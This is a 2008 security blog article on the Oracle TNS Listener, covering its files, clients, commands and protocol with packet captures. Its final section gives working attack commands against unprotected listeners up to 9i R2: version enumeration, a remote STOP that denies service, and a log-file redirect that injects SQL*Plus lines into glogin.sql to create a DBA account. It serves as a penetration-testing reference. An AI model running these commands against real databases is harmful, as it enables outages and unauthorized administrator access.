THE

SPRAWL

  •  
  •  
  •  
  • Oracle Listener serves as a main communication point for the database. It provides necessary abstraction to host's transport protocols in order to allow Oracle's higher level session protocols to function across multiple platforms.

    Architecture

    All database clients must first establish connection with the listener and then wait to be redirected to the database itself. TNS Listener is also used during external procedure calls. TNS Listener is managed by connecting to it locally or remotely (versions prior to 10g) or by editing configuration files.

    Oracle Listener consists of several important files:

    tnslnr
    TNS Listener Server process.
    listener.ora
    Listener configuration file. Located in ORACLE_HOME/network/admin/.
    sqlnet.ora
    SQLNet configuration file. Located in ORACLE_HOME/network/admin/*.
    tnsnames.ora
    Configuration file listing databases addresses. Located in ORACLE_HOME/network/admin/.
    TNS_ADMIN
    Environment variable which contains the location of SQLNet configuration files above. ORACLE_HOME/network/admin/* by default.
    listener.log
    Contains logs of listener connection attempts, usernames, client programs, etc. Located in ORACLE_HOME/network/log/. NOTE: Connections made through XMLDB's FTP or HTTP ports are not logged.

    Oracle's proprietary TNS (Transparent Network Substrate) protocol is used to for client-server communication. This service listens by default on port 1521. It can also use other ports 1522-1540 or a custom port set in listener.ora:

    LISTENER =
      (DESCRIPTION_LIST =
        (DESCRIPTION =
          (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1))
          (ADDRESS = (PROTOCOL = TCP)(HOST = oracle_hostname)(PORT = 1522))
        )
       )
    

    As we can see from the above configuration snippet, TNS Listener waits for connections coming over network using TCP/IP protocol or through a named pipe using IPC.

    Clients

    There are several clients available to communicate with TNS Listener:

    lsnrctl
    Oracle's official listener client. It can be obtained from server installation in ORACLE_HOME/BIN/. In order to run lsnrctl remotely from a client, install full Oracle client and copy lsnrctl executable into client's ORACLE_HOME/BIN directory.
    tnscmd.pl
    Perl script developed by James W. Abendschan. This client includes additional functionality like the ability to inject arbitrary raw commands. NOTE: There is tnscmd10g.pl updated version of this program which works with Oracle 10g.
    Oracle TNSLSNR IP Client
    Windows GUI version of tnscmd.pl by DokFLeed.net
    tnsping
    Used to test connection to the listener.

    Commands

    We can communicate with the listener by using Oracle's LSNRCTL:

    lsnrctl COMMAND 192.168.1.102
    

    or

    LSNRCTL> set current_listener 192.168.1.102
    Current Listener is 192.168.1.102
    LSNRCTL> COMMAND
    

    tnscmd.pl can also be used when testing from unix machines:

    ./tnscmd.pl COMMAND -h 192.168.1.102
    

    TNS Listener could be administered remotely before 10g was introduced. Starting with 10g only version can be queried remotely, the rest of the commands must be executed locally. This is due to LOCAL_OS_AUTHENTICATION_ parameter in listener.ora configuration file. However, it is still possible to communicate with TNS Listener locally over named pipes.

    VERSION

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
            TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
            Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9
    .2.0.1.0 - Production
            Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.
    1.0 - Production,,
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Production
            TNS for 32-bit Windows: Version 10.2.0.1.0 - Production
            Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 1
    0.2.0.1.0 - Production
            Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 10.2.0
    .1.0 - Production,,
    

    STATUS

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Produc
    tion
    Start Date                08-FEB-2008 21:03:54
    Uptime                    0 days 0 hr. 38 min. 50 sec
    Trace Level               off
    Security                  OFF
    SNMP                      OFF
    Listener Parameter File   C:\oracle\ora92\network\admin\listener.ora
    Listener Log File         C:\oracle\ora92\network\log\listener.log
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=8080))(Presentatio
    n=HTTP)(Session=RAW))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=2100))(Presentatio
    n=FTP)(Session=RAW))
    Services Summary...
    Service "ORCL" has 2 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
      Instance "ORCL", status READY, has 1 handler(s) for this service...
    Service "ORCLXDB" has 1 instance(s).
      Instance "ORCL", status READY, has 1 handler(s) for this service...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    SERVICES

    Oracle 9i R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    Services Summary...
    Service "ORCL" has 2 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0
             LOCAL SERVER
      Instance "ORCL", status READY, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0 state:ready
             LOCAL SERVER
    Service "ORCLXDB" has 1 instance(s).
      Instance "ORCL", status READY, has 1 handler(s) for this service...
        Handler(s):
          "D000" established:0 refused:0 current:0 max:1002 state:ready
             DISPATCHER <machine: ORACLE9I-R2, pid: 244>
             (ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1033))
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
        Handler(s):
          "DEDICATED" established:0 refused:0
             LOCAL SERVER
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    STOP

    WARNING: You will not be able to connect to the listener after successfully issuing this command!

    Oracle 9i R2:

    LSNRCTL> set current_listener 192.168.1.102
    Current Listener is 192.168.1.102
    LSNRCTL> stop
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    The command completed successfully
    LSNRCTL> version
    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.102)(PORT=1521)))
    TNS-12541: TNS:no listener
     TNS-12560: TNS:protocol adapter error
      TNS-00511: No listener
       32-bit Windows Error: 61: Unknown error
    

    Oracle 10g R2:

    Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.104))(ADDRESS=(
    PROTOCOL=TCP)(HOST=192.168.1.104)(PORT=1521)))
    TNS-01189: The listener could not authenticate the user
    

    START

    NOTE: START can only be executed locally on the system assuming the listener was previously stopped which would prevent any remote connection.

    Oracle 9i R2:

    LSNRCTL> start
    Starting tnslsnr: please wait...
    
    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    System parameter file is C:\oracle\ora92\network\admin\listener.ora
    Log messages written to C:\oracle\ora92\network\log\listener.log
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc
    )))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521))
    )
    
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
    
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Produc
    tion
    Start Date                09-FEB-2008 21:29:43
    Uptime                    0 days 0 hr. 0 min. 2 sec
    Trace Level               off
    Security                  OFF
    SNMP                      OFF
    Listener Parameter File   C:\oracle\ora92\network\admin\listener.ora
    Listener Log File         C:\oracle\ora92\network\log\listener.log
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=Oracle9i-R2)(PORT=1521)))
    Services Summary...
    Service "ORCL" has 1 instance(s).
      Instance "ORCL", status UNKNOWN, has 1 handler(s) for this service...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    The command completed successfully
    

    Oracle 10g R2:

    LSNRCTL> start
    Starting tnslsnr: please wait...
    
    TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Production
    System parameter file is C:\oracle\product\10.2.0\db_1\network\admin\listener.or
    a
    Log messages written to C:\oracle\product\10.2.0\db_1\network\log\listener.log
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC1ipc
    )))
    Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.104)(PORT=1521
    )))
    
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1)))
    
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 10.2.0.1.0 - Produ
    ction
    Start Date                09-FEB-2008 21:32:17
    Uptime                    0 days 0 hr. 0 min. 3 sec
    Trace Level               off
    Security                  ON: Local OS Authentication
    SNMP                      OFF
    Listener Parameter File   C:\oracle\product\10.2.0\db_1\network\admin\listener.o
    ra
    Listener Log File         C:\oracle\product\10.2.0\db_1\network\log\listener.log
    
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC1ipc)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.104)(PORT=1521)))
    Services Summary...
    Service "PLSExtProc" has 1 instance(s).
      Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
    The command completed successfully
    

    Listener Protocol

    Below is a sample exchange between lsnrctl and tnslsnr to obtain version information:

    Connect

    Immediately after TCP connection is established between a client and server, a TNS Connect packet is sent to the server with the following service request:

    (DESCRIPTION=
       (CONNECT_DATA=
          (CID=                    
             (PROGRAM=)     <- program name is not supplied by lsnrctl
             (HOST=)        <- database host is not supplied since we connect to listener only
             (USER=vmware)  <- username of client machine
          )
          (COMMAND=version) <- command to execute on the listener
          (ARGUMENTS=64)
          (SERVICE=192.168.1.102) <- listener address
          (VERSION=169869568)     <- client lsnrctl version (169869568 is A200100 in hex
       )                                                     which stands for is 10.2.0.1)
    )
    

    Here is a packet capture of this connect packet:

     4   0.000458 192.168.1.108 -> 192.168.1.102 TNS Request, Connect (1), Connect
     0000  00 0c 29 0c 9a c7 00 0c 29 fd 07 3d 08 00 45 00   ..).....)..=..E.
     0010  00 ec 55 99 40 00 80 06 20 50 c0 a8 01 6c c0 a8   ..U.@... P...l..
     0020  01 66 04 55 05 f1 98 08 37 18 2a 0c 4a 2c 50 18   .f.U....7.*.J,P.
     0030  ff ff e6 16 00 00 00 c4 00 00 01 00 00 00 01 39   ...............9
     0040  01 2c 00 81 08 00 7f ff c6 0e 00 00 01 00 00 8a   .,..............
     0050  00 3a 00 00 07 f8 0c 0c 00 00 00 00 00 00 00 00   .:..............
     0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
     0070  28 44 45 53 43 52 49 50 54 49 4f 4e 3d 28 43 4f   (DESCRIPTION=(CO
     0080  4e 4e 45 43 54 5f 44 41 54 41 3d 28 43 49 44 3d   NNECT_DATA=(CID=
     0090  28 50 52 4f 47 52 41 4d 3d 29 28 48 4f 53 54 3d   (PROGRAM=)(HOST=
     00a0  29 28 55 53 45 52 3d 76 6d 77 61 72 65 29 29 28   )(USER=vmware))(
     00b0  43 4f 4d 4d 41 4e 44 3d 76 65 72 73 69 6f 6e 29   COMMAND=version)
     00c0  28 41 52 47 55 4d 45 4e 54 53 3d 36 34 29 28 53   (ARGUMENTS=64)(S
     00d0  45 52 56 49 43 45 3d 31 39 32 2e 31 36 38 2e 31   ERVICE=192.168.1
     00e0  2e 31 30 32 29 28 56 45 52 53 49 4f 4e 3d 31 36   .102)(VERSION=16
     00f0  39 38 36 39 35 36 38 29 29 29                     9869568)))
    

    tnscmd.pl client has a slightly different Connect string which can be useful to identify this client:

    (CONNECT_DATA=
       (CID=
          (PROGRAM=)
          (HOST=linux)   <-------
          (USER=oracle)  <-------
       )
       (COMMAND=status)
       (ARGUMENTS=64)
       (SERVICE=LISTENER)
       (VERSION=169869568)
    )
    

    Accept

    If listener command received is valid, TNS Listener will respond with Accept packet containing the following information:

    (DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0))
    

    One particular interesting parameter passed back is VSNNUM which is TNS Listener's version number. A hex value of 153092352 is 9200100 which is stands for Oracle version 9.2.0.1.0 as confirmed later. This is done to ensure client version can understand Response packet coming later.

    Here is a packet capture of server's response:

     5   0.001514 192.168.1.102 -> 192.168.1.108 TNS Response, Accept (2), Accept
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 75 46 b8 40 00 80 06 2f a8 c0 a8 01 66 c0 a8   .uF.@.../....f..
     0020  01 6c 05 f1 04 55 2a 0c 4a 2c 98 08 37 dc 50 18   .l...U*.J,..7.P.
     0030  ff 3b 7d 5f 00 00 00 4d 00 00 02 00 00 00 01 38   .;}_...M.......8
     0040  00 01 08 00 7f ff 01 00 00 2d 00 20 0d 0c 00 00   .........-. ....
     0050  00 00 00 00 00 00 28 44 45 53 43 52 49 50 54 49   ......(DESCRIPTI
     0060  4f 4e 3d 28 54 4d 50 3d 29 28 56 53 4e 4e 55 4d   ON=(TMP=)(VSNNUM
     0070  3d 31 35 33 30 39 32 33 35 32 29 28 45 52 52 3d   =153092352)(ERR=
     0080  30 29 29                                          0))
    

    Data

    The response will be sent in a data packet with the following content:

    TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
    TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
    Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production
    Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.1.0 - Production,,
    

    Here is a capture of the response:

     6   0.001647 192.168.1.102 -> 192.168.1.108 TNS Response, Data (6), Data
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  01 5f 46 b9 40 00 80 06 2e bd c0 a8 01 66 c0 a8   ._F.@........f..
     0020  01 6c 05 f1 04 55 2a 0c 4a 79 98 08 37 dc 50 18   .l...U*.Jy..7.P.
     0030  ff 3b 11 55 00 00 01 37 00 00 06 00 00 00 00 00   .;.U...7........
     0040  54 4e 53 4c 53 4e 52 20 66 6f 72 20 33 32 2d 62   TNSLSNR for 32-b
     0050  69 74 20 57 69 6e 64 6f 77 73 3a 20 56 65 72 73   it Windows: Vers
     0060  69 6f 6e 20 39 2e 32 2e 30 2e 31 2e 30 20 2d 20   ion 9.2.0.1.0 -
     0070  50 72 6f 64 75 63 74 69 6f 6e 0a 09 54 4e 53 20   Production..TNS
     0080  66 6f 72 20 33 32 2d 62 69 74 20 57 69 6e 64 6f   for 32-bit Windo
     0090  77 73 3a 20 56 65 72 73 69 6f 6e 20 39 2e 32 2e   ws: Version 9.2.
     00a0  30 2e 31 2e 30 20 2d 20 50 72 6f 64 75 63 74 69   0.1.0 - Producti
     00b0  6f 6e 0a 09 57 69 6e 64 6f 77 73 20 4e 54 20 4e   on..Windows NT N
     00c0  61 6d 65 64 20 50 69 70 65 73 20 4e 54 20 50 72   amed Pipes NT Pr
     00d0  6f 74 6f 63 6f 6c 20 41 64 61 70 74 65 72 20 66   otocol Adapter f
     00e0  6f 72 20 33 32 2d 62 69 74 20 57 69 6e 64 6f 77   or 32-bit Window
     00f0  73 3a 20 56 65 72 73 69 6f 6e 20 39 2e 32 2e 30   s: Version 9.2.0
     0100  2e 31 2e 30 20 2d 20 50 72 6f 64 75 63 74 69 6f   .1.0 - Productio
     0110  6e 0a 09 57 69 6e 64 6f 77 73 20 4e 54 20 54 43   n..Windows NT TC
     0120  50 2f 49 50 20 4e 54 20 50 72 6f 74 6f 63 6f 6c   P/IP NT Protocol
     0130  20 41 64 61 70 74 65 72 20 66 6f 72 20 33 32 2d    Adapter for 32-
     0140  62 69 74 20 57 69 6e 64 6f 77 73 3a 20 56 65 72   bit Windows: Ver
     0150  73 69 6f 6e 20 39 2e 32 2e 30 2e 31 2e 30 20 2d   sion 9.2.0.1.0 -
     0160  20 50 72 6f 64 75 63 74 69 6f 6e 2c 2c             Production,,
    

    After all data was sent, the server notifies the client that all data was sent by sending another Data packet with End of File flag set:

     7   0.001690 192.168.1.108 -> 192.168.1.102 TCP 1109 > 1521 [ACK] Seq=197 Ack=389 Win=65147 Len=0
     0000  00 0c 29 0c 9a c7 00 0c 29 fd 07 3d 08 00 45 00   ..).....)..=..E.
     0010  00 28 55 9a 40 00 80 06 21 13 c0 a8 01 6c c0 a8   .(U.@...!....l..
     0020  01 66 04 55 05 f1 98 08 37 dc 2a 0c 4b b0 50 10   .f.U....7.*.K.P.
     0030  fe 7b dd 4e 00 00                                 .{.N..
    
     8   0.015022 192.168.1.102 -> 192.168.1.108 TNS Response, Data (6), Data
     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 32 46 ba 40 00 80 06 2f e9 c0 a8 01 66 c0 a8   .2F.@.../....f..
     0020  01 6c 05 f1 04 55 2a 0c 4b b0 98 08 37 dc 50 18   .l...U*.K...7.P.
     0030  ff 3b d6 32 00 00 00 0a 00 00 06 00 00 00 00 40   .;.2...........@
    

    Attacks on TNS Listener

    Version Enumeration

    VERSION

    THe listener VERSION command can be used to obtained exact version information of the Oracle database:

    lsnrctl version 192.168.1.102
    

    or

    tnscmd10g.pl version -h 192.168.1.102
    

    VSNUM

    If the first approach fails, we can still deduce the version from the error information returned by the listener stored in VSNNUM parameter:

     192.168.1.102  192.168.1.108   TNS Response, Refuse (4), Refuse
     0000   00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00  ..)..=..).....E.
     0010   00 8f 53 e2 40 00 80 06 22 64 c0 a8 01 66 c0 a8  ..S.@..."d...f..
     0020   01 6c 05 f1 04 0d e8 a0 2d 2b 67 0d 99 85 50 18  .l......-+g...P.
     0030   fe ff 59 03 00 00 00 67 00 00 04> 00 00 00 22 00  ..Y....g......".
     0040   00 5b 28 44 45 53 43 52 49 50 54 49 4f 4e 3d 28  .[(DESCRIPTION=(
     0050   54 4d 50 3d 29 28 56 53 4e 4e 55 4d 3d 31 35 33  TMP=)(VSNNUM=153
     0060   30 39 32 33 35 32 29 28 45 52 52 3d 31 32 35 31  092352)(ERR=1251
     0070   34 29 28 45 52 52 4f 52 5f 53 54 41 43 4b 3d 28  4)(ERROR_STACK=(
     0080   45 52 52 4f 52 3d 28 43 4f 44 45 3d 31 32 35 31  ERROR=(CODE=1251
     0090   34 29 28 45 4d 46 49 3d 34 29 29 29 29           4)(EMFI=4))))
    

    A hex value of a value stored in VSNNUM will provide listener's version number. In this case 153092352 is 9200100 in HEX which stands for Oracle 9.2.0.1.0. Here is another example, VSNUM=185599488 stands for B100600 in HEX which stands for Oracle 11.1.0.6.0.

    Connect/Accept

    Client version number can be enumerated by analyzing Connect packet:

     0000   00 0c 29 fd 07 3d 00 0c 29 b9 9e e9 08 00 45 00  ..)..=..).....E.
     0010   01 04 bd ab 40 00 40 06 f7 b8 c0 a8 01 d3 c0 a8  ....@.@.........
     0020   01 6c 76 72 05 f1 df 11 4d 70 c1 51 f7 12 80 18  .lvr....Mp.Q....
     0030   00 2e 6b 95 00 00 01 01 08 0a 00 4a fc 86 00 00  ..k........J....
     0040   00 00 00 d0 00 00 01 00 00 00 01 3a 01 2c 00 81  ...........:.,..
     0050   20 00 7f ff 7f 08 00 00 01 00 00 96 00 3a 00 00   ............:..
     0060   07 f8 0c 0c 00 00 00 00 00 00 00 00 00 00 00 00  ................
     0070   00 00 00 00 00 00 00 00 00 00 00 00 28 44 45 53  ............(DES
     0080   43 52 49 50 54 49 4f 4e 3d 28 43 4f 4e 4e 45 43  CRIPTION=(CONNEC
     0090   54 5f 44 41 54 41 3d 28 43 49 44 3d 28 50 52 4f  T_DATA=(CID=(PRO
     00a0   47 52 41 4d 3d 29 28 48 4f 53 54 3d 66 38 2e 74  GRAM=)(HOST=f8.t
     00b0   68 65 73 70 72 61 77 6c 29 28 55 53 45 52 3d 6f  hesprawl)(USER=o
     00c0   72 61 63 6c 65 29 29 28 43 4f 4d 4d 41 4e 44 3d  racle))(COMMAND=
     00d0   76 65 72 73 69 6f 6e 29 28 41 52 47 55 4d 45 4e  version)(ARGUMEN
     00e0   54 53 3d 36 34 29 28 53 45 52 56 49 43 45 3d 31  TS=64)(SERVICE=1
     00f0   39 32 2e 31 36 38 2e 31 2e 31 30 38 29 28 56 45  92.168.1.108)(VE
     0100   52 53 49 4f 4e 3d 31 38 35 35 39 39 34 38 38 29  RSION=185599488)
     0110   29 29                                            ))
    

    9th and 10th bytes of TNS packet contain encoded version number of the client. These IDs can be decoded as follows:

    ID Version
    0x136 Oracle 8
    0x137 Oracle 9i R1
    0x138 Oracle 9i R2
    0x139 Oracle 10g R1/R2
    0x13a Oracle 11g R1

    Similar information can be obtained about the server from Accept packet:

     0000  00 0c 29 fd 07 3d 00 0c 29 0c 9a c7 08 00 45 00   ..)..=..).....E.
     0010  00 48 7c cf 40 00 80 06 f9 bd c0 a8 01 66 c0 a8   .H|.@........f..
     0020  01 6c 11 d9 04 67 b6 88 7a 22 0e a7 cb 81 50 18   .l...g..z"....P.
     0030  ff 01 1d 97 00 00 00 20 00 00 02 04 00 00 01 38   ....... .......8
     0040  00 00 08 00 7f ff 01 00 00 00 00 20 61 61 00 00   ........... aa..
     0050  00 00 00 00 00 00                                 ......
    

    According to the table above, the server version that sent this packet is Oracle 9i R2 (0x138).

    tnsver

    Denial of Service

    Unprotected Listener versions up to 9i R2 can be remotely stopped to prevent any further database logins with STOP command.

    lsnrctl stop 192.168.1.102
    

    or

    tnscmd10g.pl stop -h 192.168.1.102
    

    Writing to Arbitrary Files

    Unprotected Listener versions up to 9i R2 can be remotely manipulated to write to an arbitrary log file by changing log file name and then writing data into it by sending raw commands to the listener.

    First let's learn about Oracle's directory structure by issuing STATUS command.

     tnscmd10g.pl status -h 192.168.1.102 --indent
     sending (CONNECT_DATA=(COMMAND=status)) to 192.168.1.102:1521
     writing 89 bytes
     reading
     . .......6.........P. ...........Z........
      DESCRIPTION=
        TMP=  
        VSNNUM=153092352  
        ERR=0  
        ALIAS=LISTENER  
        SECURITY=OFF  
        VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production  
        START_DATE=09-FEB-2008 13:32:16  
        SIDNUM=1
        LOGFILE=C:\oracle\ora92\network\log\listener.log
        PRMFILE=C:\oracle\ora92\network\admin\listener.ora
        TRACING=off  
        UPTIME=753082  
        SNMP=OFF  
        PID=1376
     ...
    

    Now we know the path to ORACLE_HOME is C:\oracle\ora92*. Next step is to change log file location to arbitrary file like SQLPlus startup file glogin.sql:

     LSNRCTL> set current_listener 192.168.1.102
     Current Listener is 192.168.1.102
     LSNRCTL> set log_file "C:\oracle\ora92\sqlplus\admin\glogin.sql"
     Connecting to (DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=192.168.1.102))(ADDRESS=(PROTOCOL=TCP)
     (HOST=192.168.1.102)(PORT=1521)))
     192.168.1.102 parameter "log_file" set to C:\oracle\ora92\sqlplus\admin\glogin.sql
     The command completed successfully
    

    or using tnscmd10g:

     tnscmd10g.pl --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=vmware))
     (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=192.168.1.102)(VERSION=169869568)
     (VALUE=C:\oracle\ora92\sqlplus\admin\glogin.sql)))" -h 192.168.1.102
     sending (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=vmware))
     (COMMAND=log_file)(ARGUMENTS=4)(SERVICE=192.168.1.102)(VERSION=169869568)
     (VALUE=C:\oracle\ora92\sqlplus\admin\glogin.sql))) to 192.168.1.102:1521
     writing 244 bytes
     reading
     ........"..u(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(COMMAND=log_file)
     (LOGFILENAME=C:\oracle\ora92\sqlplus\admin\glogin.sql))
    

    Now we can inject raw commands to the listener which will be appended to the log file:

    tnscmd10g.pl -h 192.168.1.102 --rawcmd "(CONNECT_DATA((
    set term off
    create user hacker identified by hacker;
    grant dba to hacker;
    set term on
    host echo hi, you have just been pwned
    "
    

    NOTE: If you want to type up the above command instead of just pasting it into your console be sure to use backslashes to create new line and skip the first line as follows:

    tnscmd10g.pl -h 192.168.1.102 --rawcmd "(CONNECT_DATA((\
    >
    > set term off
    ...
    

    NOTE: glogin.sql will have the following lines appended to it:

    TNS-01153: Failed to process string: (CONNECT_DATA((
    set term off
    create user hacker identified by hacker;
    grant dba to hacker;
    set term on
    host echo hi, you have just been pwned
    
     NL-00303: syntax error in NV string
    

    Once DBA will login with sqlplus he or she will trigger the startup file:

    SP2-0734: unknown command beginning "09-FEB-200..." - rest of line ignored.
    SP2-0734: unknown command beginning "09-FEB-200..." - rest of line ignored.
    SP2-0734: unknown command beginning "TNS-01153:..." - rest of line ignored.
    hi, you have just been pwned
    
    SP2-0734: unknown command beginning "NL-00303: ..." - rest of line ignored.
    SQL>
    

    At this point there should be a valid account hacker/hacker created with full DBA privileges.

    External Links

    Published on July 1st, 2008 by iphelix

    sprawlsimilar

    orapass des

    Download orapass-des.py
    Size 1.6 KB
    DateFebruary 21st, 2009
    Version0.1

    Orapass implements Oracle's older DES-based password hashing algorithm. This script can be used for password strength audit and recovery. Uses Python Crypto library. Read more.

    oracle default ports

    Oracle Database is a complex system requiring a large number of services running on a single system. This article attempts to enumerate common Oracle services and associated network ports found on live systems. Read more.

    oracle database commands

    Useful Oracle PL/SQL commands: Read more.

    oracle authentication

    Oracle Authentication process requires users to provide correct username, password, database hostname, and instance name (SID). Read more.


    sprawlcomments

    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.

    π
    ///\oo/\\\